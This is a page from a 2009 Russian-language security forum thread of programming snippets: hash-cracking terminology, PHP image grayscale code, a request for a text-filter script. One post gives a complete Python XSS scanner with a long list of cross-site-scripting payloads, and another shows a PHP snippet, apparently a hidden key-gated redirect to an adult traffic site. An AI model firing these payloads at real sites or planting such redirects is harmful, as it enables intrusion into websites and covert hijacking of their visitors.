ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование_OLD > PHP, PERL, MySQL, JavaScript
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #921  
Старый 09.10.2009, 19:25
[Dezzter]
Участник форума
Регистрация: 26.11.2007
Сообщений: 266
Провел на форуме:
3412198

Репутация: 341
По умолчанию

Цитата:
мд5 нельзя расшифровать?
а разве можно? я думал хешики брутят, а не расшифровывают)
 

  #922  
Старый 09.10.2009, 19:30
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от [Dezzter]  
а разве можно? я думал хешики брутят, а не расшифровывают)
хеши - брутят , я написал "расшифровуют" т.к. просто именно это слово наиболее понятно подходит по смыслу.

Последний раз редактировалось L I G A; 10.10.2009 в 11:30..
 

  #923  
Старый 09.10.2009, 19:32
login999
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме:
4512757

Репутация: 973


По умолчанию

Цитата:
Сообщение от [Dezzter]  
а разве можно? я думал хешики брутят, а не расшифровывают)
Перестаньте придираться к словам, что мешает добавить в функцию еще и для генерации хэша из этого base64 и ложить в БД хэш, или обратно его прогнать таким образом.
 

  #924  
Старый 09.10.2009, 19:45
ReduKToR
Постоянный
Регистрация: 05.01.2009
Сообщений: 684
Провел на форуме:
3281634

Репутация: 485


Отправить сообщение для ReduKToR с помощью ICQ
По умолчанию

Спс............
да и врядле ктото при взломе будет искать именно эту тему и именно этот алгоритм
 

  #925  
Старый 09.10.2009, 20:35
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Цитата:
хеши - расшифровуют , тема есть же Расшифровка хешей
Почитай на досуге что значит "расшифровать" и что значит "сбрутить" и что такое "хэш".
ИМХО (это значит МОЁ мнение, я его не навязываю) лучше использовать алгоритмы типа мд5 т.к. РАСШИФРОВАТЬ невозможно, возможно сбрутить. А всякие извраты не являются хорошей защитой, т.к. рано или поздно алгоритм твоего "хэширования" может стать известен третьему лицу и тогда можно будет получить ВСЕ пароли, в отличии от мд5 в котором есть возможность брутить хэш а есть возможность и не сбрутить))

ЗЫ Хэширование - необратимое шифрование.
 

  #926  
Старый 18.10.2009, 22:11
heretic1990
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
Провел на форуме:
3728999

Репутация: 444
По умолчанию

Данная функция позволяет конвертировать цветное изображение в черно-белое.

PHP код:
<?php
function MakeColoursGrey($im,$col){
 
$total=ImageColorsTotal($im);
 for(
$i=0;$i<$total;$i++){
   
$old=ImageColorsForIndex($im,$i);
  
   
$commongrey=(int)($old[red]+$old[green]+$old[blue])/3;
   if(!
$col){
    
ImageColorSet($im,$i,$commongrey,$commongrey,$commongrey);
   }elseif(
$col==1){
    
ImageColorSet($im,$i,$commongrey,0,0);
   }elseif(
$col==2){
    
ImageColorSet($im,$i,0,$commongrey,0);
   }elseif(
$col==3){
    
ImageColorSet($im,$i,0,0,$commongrey);
   }
 }
}

$img=imagecreatefromgif($src);

MakeColoursGrey($img,$col);

Header("Content-Type: image/gif");

ImageGif($img);
?>
 

  #927  
Старый 19.10.2009, 00:46
d_x
Reservists Of Antichat - Level 6
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635

Репутация: 2407


По умолчанию

Цитата:
Данная функция позволяет конвертировать цветное изображение в черно-белое.
PHP код:
imagefilter($img,IMG_FILTER_GRAYSCALE); 
 

  #928  
Старый 20.10.2009, 20:55
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию

Реализация простого XSS Сканнера на Питоне

Код:
#!/usr/bin/python 

import sys, urllib2, re, time, httplib, socket

xss_ploads = ["%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E", 
    "';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",
    "'';!--\"<XSS>=&{()}",
    "<IMG SRC=\"javascript:alert('XSS');\">",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",
    "<IMG SRC=javascript:alert(&quot;XSS&quot;)>",
    "<IMG SRC=`javascript:alert(\"is this, 'XSS'\")`>",
    "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">",
    "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
    "<IMG SRC=javascript:alert('XSS')>",
    "<IMG SRC=\"jav    ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
    "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
    "perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out",
    "perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out",
    "<IMG SRC=\"   javascript:alert('XSS');\">",
    "<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>",
    "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
    "<IMG SRC=\"javascript:alert('XSS')\"",
    "<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>",
    "\";alert('XSS');//",
    "</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>",
    "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">",
    "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
    "<BODY ONLOAD=alert('XSS')>",
    "<IMG DYNSRC=\"javascript:alert('XSS')\">",
    "<IMG LOWSRC=\"javascript:alert('XSS')\">",
    "<BGSOUND SRC=\"javascript:alert('XSS');\">",
    "<BR SIZE=\"&{alert('XSS')}\">",
    "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
    "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS",
    "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
    "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
    "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
    "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
    "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
    "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">",
    "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
    "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
    "<DIV STYLE=\"width: expression(alert('XSS'));\">",
    "<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>",
    "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
    "<XSS STYLE=\"xss:expression(alert('XSS'))\">",
    "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
    "<BASE HREF=\"javascript:alert('XSS');//\">",
    "<? echo('<SCR)'; echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>",
    "<A HREF=\"http://1113982867/\">XSS</A>",
    "<A HREF=\"http://www.google.com./\">XSS</A>"]

def xss(payload):
    print "Testing:",payload #Comment out if needed
    try:
        if proxy != 0:
            proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
            opener = urllib2.build_opener("http://"+host+payload, proxy_handler)
            source = opener.open("http://"+host+payload).read()
        else:
            source = urllib2.urlopen("http://"+host+payload).read()
        print "Source Length:",len(source) #Comment out if needed
        if re.search("xss", source.lower()) != None: 
            print "\n[!] XSS:",host+payload,"\n"
        else: 
            print "[-] Not Vuln." 
    except(urllib2.HTTPError), msg:
        print "[-] Error:",msg
        pass

print "\nd3hydr8[at]gmail[dot]com XSStest v1.1" 
print "---------------------------------------" 
 
if len(sys.argv) not in [2,4]: 
    print "\nUsage: ./xsstest.py <site> <options>"
    print "\t[options]"
    print "\t   -p/-proxy <host:port> : Add proxy support"
    print "ex: ./xsstest.py www.example.com/index.php?page= 20.15.4.76:3128\n"  
    sys.exit(1) 
 
host = sys.argv[1].replace("http://","") 
if host[-1:] != "=": 
    print "\n[-] Host should end with a \'=\'\n" 
    sys.exit(1)
    
try:
    if sys.argv[3]:
        proxy = sys.argv[3]
        print "\n[+] Testing Proxy..."
        h2 = httplib.HTTPConnection(proxy)
        h2.connect()
        print "[+] Proxy:",proxy
except(socket.timeout):
    print "\n[-] Proxy Timed Out"
    proxy = 0
    pass
except(NameError):
    print "\n[-] Proxy Not Given"
    proxy = 0
    pass
except:
    print "\n[-] Proxy Failed"
    proxy = 0
    pass
print "\n[+] Scanning:",host
print "[+] Loaded:",len(xss_ploads),"payloads\n"
for payload in xss_ploads:
    time.sleep(5) #Change this in seconds, if needed
    xss(payload.replace("\n",""))
print "\n[+] Done\n"
 

  #929  
Старый 21.10.2009, 22:23
AVIRA
Новичок
Регистрация: 12.08.2009
Сообщений: 8
Провел на форуме:
31464

Репутация: 0
По умолчанию

кто помможет разобратся?есть скрипт пеереадресации по ключу (слову набор цифр) вот пример скрипта что ставится на редикетном сайте в индекс пхп выше основного кода страницы, ключ в данном случае 888888

<?
if(@$_POST['key']=="888888"):
if(eregi("opera",$_SERVER['HTTP_USER_AGENT'])):
print '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">
window.location = "http://traffadult.com/advpage.php?sub=666";
</script>
<meta http-equiv="Expires" content="Thu, Jan 1 1970 00:09:00 GMT">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">
<title>ipserf.net</title> </head> <body>
<a href="http://traffadult.com/advpage.php?sub=666">click me!</a>
</body></html>';
exit();
else:
Header("Content-type: text/vnd.wap.wml; charset=utf-8");
echo '<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.2//EN" "http://www.wapforum.org/DTD/wml_1.1.xml">
<wml><head><meta http-equiv="Cache-Control" content="no-cache" forua="true"/>
</head>
<card id="main">
<onevent type="onenteforward">
<go href="http://traffadult.com/advpage.php?sub=666">
<setvar name="key" value="" />
</go></onevent></card></wml>';
exit();
endif;
endif;
?>


кто подскажет какая первая часть скрипта которая отправляет данные?очен надо может подскажет кто?
 

  #930  
Старый 21.10.2009, 22:25
PenSpinner
Познающий
Регистрация: 10.12.2008
Сообщений: 35
Провел на форуме:
200093

Репутация: 17
Отправить сообщение для PenSpinner с помощью ICQ
По умолчанию

надеюсь здесь можно делать реквесты...так вот, реквестирую скрипт, который удалит из текстового файла все строчки, в которых нет букв ( a-z, A-Z, пустые строчки оставить).

Последний раз редактировалось PenSpinner; 21.10.2009 в 22:39..
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ